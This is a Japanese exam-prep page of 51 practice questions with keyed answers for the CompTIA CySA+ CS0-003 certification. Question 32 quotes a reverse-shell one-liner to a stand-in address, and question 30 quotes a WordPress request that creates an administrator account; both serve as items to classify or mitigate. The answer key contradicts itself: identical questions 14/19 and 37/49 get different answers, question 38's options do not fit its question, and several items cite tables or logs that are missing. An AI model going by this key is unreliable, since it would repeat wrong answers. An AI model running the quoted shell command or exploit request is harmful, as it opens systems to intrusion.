すべての情報を見逃したくないですか?

認定試験に合格するためのヒント

最新の試験ニュースと割引情報

当社の専門家による厳選最新情報

はい、ニュースを送ってください

CS0-003練習問題でCompTIA CySA+試験に合格する

CySA+ 認定資格は、継続的なセキュリティ監視を通じて、インシデントの検出、予防、および対応を担当するサイバーセキュリティの専門家向けに設計されています。当社の試験問題は、脅威検出、データ分析、脆弱性管理など、CySA+ 認定に不可欠なトピックを幅広くカバーしています。当社は、学習資料や試験ガイドなどの貴重な試験準備リソースを提供しています。これらのリソースは、重要な概念の理解を深め、試験の準備態勢を向上させるために慎重に作成されています。 さらに準備を進めるには、模擬試験をご利用ください。これらの模擬試験は試験環境を再現し、実際の試験の前に自分の知識とスキルを評価することができます。弊社のサポートでCompTIA Cybersecurity Analyst (CySA+) CS0-003試験に合格し、認定資格を取得することは十分に可能です。
他のオンライン試験を受ける

質問 #1
セキュリティチームが、あるWebサーバにXSSがないかどうかを確認し、次のNmapスキャンを実行した。
A. パラメータとして「>」と「"」が出力される。
B. 脆弱なパラメータID http://172
C. 脆弱性のあるパラメータと、フィルタリングされていない、あるいはエンコードされた文字が、安全でないものとして">"と">"に渡される。
D. 脆弱性のあるパラメータと文字「>」と「"」で、XSSの試みが反映されている。
回答を見る
正解: D
質問 #2
ある企業が脆弱性管理プログラムを導入しようとしているが、セキュリティチームに機密データへのアクセスを許可することに懸念がある。最も正確な脆弱性スキャンの結果を提供しながら、システムへのアクセスを減らすために実施できるスキャン方法は、次のうちどれでしょうか。
A. 認証されたネットワークスキャン
B. パッシブスキャン
C. エージェントベースのスキャン
D. ダイナミック・スキャン
回答を見る
正解: C
質問 #3
インシデントレスポンスチームが、インターネット障害の調査を開始するようアラートを受信した。この障害により、複数の場所にいるすべてのユーザが外部の SaaS リソースにアクセスできなくなっている。チームは、組織がDDoS攻撃の影響を受けたと判断します。チームが最初に確認すべきログはどれですか?
A. CDN
B. 脆弱性スキャナー
C. DNS
D. ウェブサーバー
回答を見る
正解: C
質問 #4
地理的に多様な従業員と動的なIPを持つ企業が、ネットワークトラフィックを削減した脆弱性スキャン方法を導入したいと考えています。この要件に最も適しているのは次のうちどれでしょうか。
A. 外部
B. エージェント・ベース
C. 資格なし
D. 資格あり
回答を見る
正解: B
質問 #5
ある企業が脆弱性管理プログラムを導入し、オンプレミス環境からハイブリッドIaaSクラウド環境に移行しようとしている。新しいハイブリッド環境で考慮すべきことは次のうちどれですか?
A. 現在のスキャナーはクラウドに移行すべきである。
B. クラウド特有の設定ミスは、現在のスキャナーでは検出できない可能性がある。
C. 既存の脆弱性スキャナはIaaSシステムをスキャンできない
D. クラウド環境の脆弱性スキャンは、クラウドから実行すべきである。
回答を見る
正解: B
質問 #6
あるセキュリティチームが、セキュリティ事象が発生した後に誰が次のステップを実施すべきかについて悩んだ末に、教訓会議を実施した。この問題に対処するために、チームは次のうちどれを作成すべきか。
A. サービスレベル契約
B. 変更管理計画
C. 事故対応計画
D. 覚書
回答を見る
正解: C
質問 #7
あるインシデント対応チームが、重要なサーバーで IoC を発見した。チームはさらなる調査のために、隔離して技術的証拠を収集する必要があります。サーバーを分離する前に、機密情報を保護するために、次のデータのどれを最初に収集すべきですか?
A. ハードディスク
B. プライマリブートパーティション
C. 悪意のあるファイル
D. ルーティングテーブル
E. 固定IPアドレス
回答を見る
正解: D
質問 #8
あるアナリストがシステムの問題を調査するためにインターネットを使用した後、サーバープール内の仮想ウェブサーバーがマルウェアに感染した。サーバーが再構築され、サーバープールに追加された後、ユーザーからウェブサイトの問題が報告され、そのサイトは信頼できないことがわかりました。サーバーの問題の原因として最も可能性が高いのは次のうちどれですか?
A. サーバーがSSLを使用してデータを安全に送信するように設定されています。
B. サーバーがクライアント接続に弱いTLSプロトコルをサポートしていた。
C. マルウェアがプール内のすべてのWebサーバーに感染した。
D. Webサーバーのデジタル証明書は自己署名されていた。
回答を見る
正解: D
質問 #9
ゼロデイコマンドインジェクションの脆弱性が公表されました。セキュリティ管理者は、次のログを分析し、敵対者が脆弱性を悪用しようとしている証拠を探しています。
A. ログ・エントリー1
B. ログ・エントリー2
C. ログ・エントリー3
D. ログ・エントリー4
回答を見る
正解: A
質問 #10
あるサイバーセキュリティ・チームリーダーが、毎週のエグゼクティブ・ブリーフで発表する指標を開発している。経営幹部は、ネットワークに侵入したマルウェアの拡散を阻止するのにかかる時間を知りたがっています。このチームリーダーが報告書に含めるべきメトリクスは次のうちどれでしょうか?
A. 平均故障間隔
B. 平均検出時間
C. 平均修復時間
D. 平均封じ込め時間
回答を見る
正解: D
質問 #11
サイバーセキュリティのアナリストが、会社が取引していない国から異常なネットワークスキャンアクティビティが来ていることに気づきました。次のうち、最適な緩和手法はどれですか?
A. 問題のある送信元の国をジオブロックする。
B. ネットワークファイアウォールでスキャンのIP範囲をブロックする。
C. 過去の傾向分析を行い、同様のスキャン活動を探す。
D. ネットワークファイアウォールでスキャンの特定のIPアドレスをブロックする。
回答を見る
正解: B
質問 #12
サイバーキルチェーンの次の段階のうち、敵対者が悪用に成功したターゲットとの通信を確立しようとするのはどれか?
A. 指揮統制
B. 目標に対する行動
C. 搾取
D. 配達
回答を見る
正解: A
質問 #13
あるインシデント対応チームが、重大なセキュリティインシデントへの対応を終 えた。管理チームは、教訓を盛り込んだ事後対応報告書を提出するよう、主任アナリストに依頼した。教訓を含める理由として、最も可能性が高いのは次のうちどれですか。
A. 事故報告に関する規制要件を満たすため
B. 他部門の責任を追及する
C. インシデント対応プロセスにおける改善点を特定する。
D. 組織のインシデント対応チームの顕著な実践を強調すること
回答を見る
正解: C
質問 #14
ある組織の最高経営責任者は最近、業界における新たな攻撃の悪用が、パッチがリリースされてから約45日後に発生していることを耳にした。この組織を最もよく保護できるのはどれか?
A. 平均修復期間30日
B. 平均検出期間45日
C. 平均回答期間15日
D. 第三者アプリケーションテスト
回答を見る
正解: A
質問 #15
同じ金曜日の午後、悪用度の高い2つの脆弱性に対するパッチがリリースされた。システムおよび脆弱性に関する情報を以下の表に示す。
A. ロジャース
B. ブレイディ
C. ブリース
D. マニング
回答を見る
正解: B
質問 #16
あるアナリストがWebサーバーのログを調べているとき、同じタイムスタンプを持つ複数のエントリが、リクエスト行にすべて奇妙な文字が含まれていることに気づきました。次に取るべき手順はどれか。
A. 直ちにネットワークをシャットダウンし、指揮系統の次の人に連絡する。
B. 奇妙な文字がどのような攻撃を示しているかを判断する。
C. 正しい攻撃のフレームワークを活用し、インシデントレスポンスの内容を決定する。
D. 事故対応のため、地元の法執行機関に通知する。
回答を見る
正解: B
質問 #17
インシデント発生時、アナリストは後の調査のために証拠を入手する必要がある。コンピュータ・システムのボラティリティ・レベルに関連して、最初に収集しなければならないものはどれか。
A. ディスクの内容
B. バックアップデータ
C. 一時ファイル
D. 実行中のプロセス
回答を見る
正解: D
質問 #18
あるセキュリティアナリストが、同じ国のIPアドレスを識別するためのシェルスクリプトを書いています。このアナリストが目的を達成するのに役立つ関数は次のうちどれですか。
A. function w() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $info" }
B. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
C. function y( { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo "$1 | $info" }
D. function z() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }
回答を見る
正解: B
質問 #19
ある組織の最高経営責任者は最近、業界における新たな攻撃の悪用が、パッチがリリースされてから約45日後に発生していることを耳にした。この組織を最もよく保護できるのはどれか?
A. 平均修復期間30日
B. 平均検出期間45日
C. 平均回答期間15日
D. 第三者アプリケーションテスト
回答を見る
正解: C
質問 #20
脆弱性スコア7.1の古いCVEが、広く利用可能なエクスプロイトがランサムウェアの配信に使用されたため、スコア9.8に引き上げられました。このエスカレーションの理由として、アナリストが最も伝えやすい要因は次のうちどれでしょうか?
A. スコープ
B. 兵器化
C. CVSS
D. 資産価値
回答を見る
正解: B
質問 #21
ある従業員がウェブサイトにアクセスし、それが原因でデバイスが侵入型マルウェアに感染した。インシデントレスポンスのアナリストは、次のうちどれを行うべきですか?
A. システムのファームウェアを更新し、ハードウェアを再イメージする。
B. アナリストに電子メールアラートを送信する追加のマルウェアスキャナをインストールする。
C. インターネットアクセスにプロキシサーバーを使用するようにシステムを設定する。
D. ユーザープロファイルを削除し、バックアップからデータを復元する。
回答を見る
正解: A
質問 #22
セキュリティ・アナリストは、各システムがホストするコンテンツの機密性に基づいて、組織全体のシステムを確実に保護する必要がある。このアナリストは、各システムの所有者と協力して、ホストされているデータの機密性、可用性、完全性を促進するための最善の方法を決定しようとしている。それぞれのシステムを分類し、優先順位をつけるために、セキュリティアナリストが最初に行うべきことはどれか。
A. これらのシステムにアクセスするユーザーにインタビューする。
B. システムをスキャンして、現在存在する脆弱性を確認する。
C. ベンダー固有のゼロデイ攻撃に対するアラートを設定する。
D. 各システムの資産価値を決定する。
回答を見る
正解: D
質問 #23
ある企業のユーザーアカウントが侵害された。また、社内ポータルが HTTP でのみアクセス可能なときと HTTPS でアクセス可能なときがあることも報告されています。次のうち、観察された活動を最もよく表しているものはどれですか?
A. SSL証明書に問題があり、HTTPSアクセスで443番ポートが利用できない。
B. 内部アクセス権を持つ何者かによって、ユーザーをポート80に強制的に誘導するオンパス攻撃が行われている。
C. ウェブサーバーが増加するHTTPSリクエストに対応できないため、ユーザーをポート80に転送している。
D. 社内ルーターに新しいルールが適用されたため、BGPでエラーが発生した。
回答を見る
正解: B
質問 #24
長期休暇中、ある企業がセキュリティ・インシデントに見舞われた。この情報はタイムリーに適切な担当者に適切に伝えられ、サーバーは最新の状態にあり、適切な監査とロギングが設定されていた。情報セキュリティ最高責任者は、何が起こったのかを正確に把握したいと考えています。アナリストが最初に取るべき行動はどれか。
A. フォレンジック分析用に仮想サーバーをクローンする
B. 影響を受けたサーバーにログを取り、ログの分析を開始する。
C. 直近のバックアップからリストアし、接続性が失われていないことを確認する。
D. 影響を受けたサーバーを直ちにシャットダウンする
回答を見る
正解: A
質問 #25
あるクラウド・チームが、不正なリソースが自動プロビジョニングされているというアラートを受け取った。調査した結果、チームはクリプトマイニングが発生していると疑っています。チームがこの結論に至る可能性が最も高い指標は次のうちどれでしょうか?
A. 高いGPU利用率
B. 帯域幅の消費
C. 不正な変更
D. 異常なトラフィックの急増
回答を見る
正解: A
質問 #26
ある組織の異なる既知の敵対者間のTTPを比較するために、セキュリティアナリストが最も使いそうなものはどれか。
A. MITRE ATT&CK
B. サイバー・キル・チャム
C. OWASP
D. STIX/TAXII
回答を見る
正解: A
質問 #27
ある組織の新入社員が、個人用デバイスの使用を禁止する会社のポリシーにもかかわらず、個人用ウェブカメラを常に接続している。SOCマネージャーは、新入社員が会社のポリシーを知らないことを発見しました。新入社員が会社のポリシーに従うことを確実にするために、SOCマネジャーが最も推奨しそうなのは次のうちどれでしょうか?
A. 人事部は、すべての新入社員に利用規約のコピーを電子メールで送付しなければならない。
B. 上司は、新入社員から利用規約を読んだことを口頭で確認しなければならない。
C. 新入社員は全員、入社時に会社のセキュリティポリシーに関するテストを受けなければならない。
D. すべての新入社員は、会社のセキュリティポリシーを承認するユーザー同意書に署名しなければならない。
回答を見る
正解: D
質問 #28
あるセキュリティアナリストが、同じ会社や地域に属する異なる送信元ネットワークから送信される可能性のあるネットワークアドレスを特定しようとしています。この目的を達成するために役立つシェルスクリプト関数は、次のうちどれですか。
A. function w() { a=$(ping -c 1 $1 | awk-F "/" 'END{print $1}') && echo "$1 | $a" }
B. function x() { b=traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }
C. function y( { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. function z() { c=$(geoiplookup$1) && echo "$1 | $c" }
回答を見る
正解: C
質問 #29
技術者がサーバー上の脆弱性を特定し、ソフトウェアパッチを適用しました。修復プロセスの次のステップはどれですか?
A. テスト
B. 実施
C. バリデーション
D. ロールバック
回答を見る
正解: C
質問 #30
あるアナリストがSIEMからIPSイベント通知を受信し、悪意のあることが分かっているIPアドレスが、複数のWebサーバ上でゼロデイ脆弱性を悪用しようと試みたと報告されました。この攻撃には、次のスニペットが含まれています:/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administratorこのスニペットで表される攻撃を軽減するために、次のコントロールのうちどれが最も効果的でしょうか?
A. ユーザー作成を管理者のみに制限する。
B. レイアウトの作成を管理者のみに制限する。
C. trx_addonsディレクトリをすべてのユーザーに対して読み取り専用に設定する。
D. すべてのユーザーに対して、ディレクトリV2を読み取り専用に設定する。
回答を見る
正解: A
質問 #31
SIEM、SOAR、および発券システムに対する最近の投資を考慮した場合、組織が注目すべき最適な指標はどれか。
A. 平均検出時間
B. 戦術別エクスプロイト数
C. アラート音量
D. 侵入試行回数
回答を見る
正解: A
質問 #32
sh -i >& /dev/udp/10.1.1.1/4821 0>$l 以下のコマンドを含む悪用の試みをセキュリティアナリストが検出した。
A. RCE
B. リバースシェル
C. XSS
D. SQLインジェクション
回答を見る
正解: B
質問 #33
あるセキュリティアナリストが、複数の標的型Windowsマルウェアバイナリを含む調査を行っている。アナリストは、攻撃者に情報を開示することなく情報を収集したいと考えています。次のうち、アナリストが目的を達成できる行動はどれか。
A. バイナリをエアギャップサンドボックスにアップロードして分析する。
B. アンチウイルスベンダーにバイナリを送る
C. インターネットに接続できる環境でバイナリを実行する。
D. VirusTotalを使用してファイルのハッシュを照会する。
回答を見る
正解: A
質問 #34
あるセキュリティアナリストが、同じ会社や地域に属する異なる送信元ネットワークから送信される可能性のあるネットワークアドレスを特定しようとしています。この目的を達成するために役立つシェルスクリプト関数は、次のうちどれですか。
A. function w() { a=$(ping -c 1 $1 | awk-F "/" 'END{print $1}') && echo "$1 | $a" }
B. function x() { b=traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }
C. function y( { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. function z() { c=$(geoiplookup$1) && echo "$1 | $c" }
回答を見る
正解: C
質問 #35
セキュリティ業務において、人の関与を最小限に抑え、プロセスの改善に役立つのはどれか。
A. OSSTMM
B. SIEM(シーム
C. SOAR
D. OWASP
回答を見る
正解: C
質問 #36
あるアナリストが、ヘッダーに追加文字を含む HTTPS トラフィックを別の国の既知の悪意のある IP に送信している内部デバイスがあることに気付きました。アナリストが気づいたことを説明するものは次のうちどれですか。
A. ビーコン
B. クロスサイトスクリプティング
C. バッファオーバーフロー
D. PHPトラバーサル
回答を見る
正解: A
質問 #37
あるセキュリティアナリストが、環境内の1台のウェブサーバに対して最近実施した脆弱性評価の結果から、次の表を得ました。
A. ウェブ開発チームにページ内容の更新を依頼する。
B. コントロールパネルにアクセスするためのIPアドレス許可リストを追加する
C. 信頼できるルートCAから適切な証明書を購入する。
D. すべてのフィールドで適切な消毒を行う。
回答を見る
正解: D
質問 #38
セキュリティスキャンの間、セキュリティアナリストが重要なアプリケーションに同じ脆弱性を定期的に見つけます。以下の推奨事項のうち、SDLC のフェーズに沿って適用された場合、この問題を最も軽減できるものはどれか?
A. 独自システム
B. レガシーシステム
C. サポートされていないオペレーティングシステム
D. メンテナンス窓の不足
回答を見る
正解: C
質問 #39
調査を開始する際、最初に行わなければならないのは次のうちどれか?
A. 警察への通報
B. 現場の確保
C. すべての関連証拠を押収する
D. 証人尋問
回答を見る
正解: B
質問 #40
以下のセキュリティ運用タスクのうち、自動化に最適なものはどれか。
A. 不審なファイル分析:フォルダー内の不審なグラフィックを探す。見つかったグラフィックのカテゴリーに基づいて、元のフォルダー内にサブフォルダーを作成する。不審なグラフィックを適切なサブフォルダーに移動する。
B. ファイアウォールのIoCブロックアクション:ファイアウォールのログを調査し、最近公開されたゼロデイ攻撃からのIoCを確認する。
C. セキュリティアプリケーションユーザのエラー:エラーログを検索して、セキュリティアプリケーションで困っているユーザの兆候を探すユーザの電話番号を調べるアプリケーションの使用に関する質問があれば、ユーザに電話してヘルプを求める
D. メールヘッダ分析:メールヘッダのフィッシング信頼度が5以上であることを確認する送信者のドメインをブロックリストに追加するメールを隔離に移動する
回答を見る
正解: D
質問 #41
セキュリティアナリストが、Wiresharkでパケットキャプチャをレビューしている。解析者は次の表示フィルタを設定します。解析者は、226の転送完了応答を持つ複数のRETR要求があることを確認できますが、パケット一覧ペインにはファイル転送そのものを含むパケットが表示されていません。ダウンロードされたファイルの全内容を確認するには、次のうちどれを実行すればよいですか?
A. 表示フィルターをftp
B. 表示フィルターをtcp
C. 表示フィルターをftp-dataに変更し、TCPストリームを追跡する。
D. Fileメニューに移動し、Export objectsオプションからFTPを選択します。
回答を見る
正解: C
質問 #42
ある組織が、企業の Web サイトに対して Web アプリケーション脆弱性評価を実施し、次のような結果を得た。
A. HttpOnlyフラグを設定し、HTTPSによる通信を強制する。
B. X-Frame-Optionsヘッダがないリクエストをブロックする
C. 許可されたドメインにAccess-Control-Allow-Originヘッダーを設定する
D. クロスオリジンリソース共有ヘッダーを無効にする。
回答を見る
正解: C
質問 #43
サイバーセキュリティのアナリストが、会社が取引していない国から異常なネットワークスキャンアクティビティが来ていることに気づきました。次のうち、最適な緩和手法はどれですか?
A. 問題のある送信元国をジオブロックする。
B. ネットワークファイアウォールでスキャンのIP範囲をブロックする。
C. 過去の傾向分析を行い、同様のスキャン活動を探す。
D. ネットワークファイアウォールでスキャンの特定のIPアドレスをブロックする。
回答を見る
正解: B
質問 #44
あるセキュリティプログラムでは、セキュリティ管理を SIEM に統合することで MTTR を 30%改善できた。アナリストがツール間を行き来する必要がなくなった。このセキュリティ対策が行ったこととして、最も適切なものはどれか。
A. データエンリッチメント
B. セキュリティ制御プレーン
C. 脅威のフィードの組み合わせ
D. 一枚ガラス
回答を見る
正解: D
質問 #45
組織外へのPIIの流出を防ぐために最も有効なツールはどれか?
A. PAM
B. IDS
C. PKI
D. DLP
回答を見る
正解: D
質問 #46
ある会社のセキュリティチームが、リソースの不適切な使用(例えば、オフィスのワークステーションにクリプトマイ ナーをインストールする従業員)に関する報告ポリシーのセクションを更新しています。業界のベストプラクティスに準拠するために、セキュリティチーム以外に、この問題を最初にエスカレーションすべきグループは次のうちどれでしょうか?
A. ヘルプデスク
B. 法執行
C. 法務部
D. 取締役
回答を見る
正解: C
質問 #47
ある組織で顧客取引の情報漏えいが発生しました。PCI DSS の条項に基づき、この組織が侵害を報告すべきグループは次のうちどれですか?
A. PCIセキュリティ基準評議会
B. 地元の法執行機関
C. 連邦法執行機関
D. カード発行会社
回答を見る
正解: D
質問 #48
セキュリティアナリストは、脆弱性を是正するための優先順位付けを担当する。関連する会社のセキュリティポリシーを以下に示す:脆弱性管理1.当社は、CVSSv3.1 Base Score Metrics(悪用可能性と影響度)を使用して、セキュリティ脆弱性の是正の優先順位を決定する。 2. 機密性と可用性のどちらかを選択しなければならない状況では、当社は、システムやデータの可用性よりもデータの機密性を優先する。
A. 名前THOR
B. 名称CAP
C. 名前LOKI
D. 名前THANOS
回答を見る
正解: B
質問 #49
あるセキュリティアナリストが、環境内の1台のウェブサーバに対して最近実施した脆弱性評価の結果から、次の表を得ました。
A. ウェブ開発チームにページ内容の更新を依頼する。
B. コントロールパネルにアクセスするためのIPアドレス許可リストを追加する。
C. 信頼できるルート CA から適切な証明書を購入する。
D. すべてのフィールドで適切な消毒を行う。
回答を見る
正解: C
質問 #50
あるユーザーがマルウェアを含むソフトウェアをコンピュータにダウンロードし、最終的に他の多数のシステムに感染させた。このユーザーは次のどれに該当しますか?
A. ハクティビスト
B. 高度持続的脅威
C. インサイダーの脅威
D. スクリプト・キディ
回答を見る
正解: D
質問 #51
あるセキュリティアナリストが、訴訟依頼に関与したシステムハードドライブを保全しなければなりません。デバイス上のデータが変更されていないことを保証するための最良の方法は、次のうちどれですか。
A. ハッシュ値を生成し、バックアップイメージを作成する。
B. デバイスを暗号化し、データの機密性を確保する。
C. 複雑なパスワードでデバイスを保護する。
D. メモリスキャンダンプを実行し、残存データを収集する。
回答を見る
正解: A

送信後に回答を表示する

質問の回答を得るには、電子メールと WhatsApp を送信してください。

注: 正しい試験結果を得ることができるように、電子メール ID と WhatsApp が有効であることを確認してください。

Eメール:
WhatsApp/電話番号: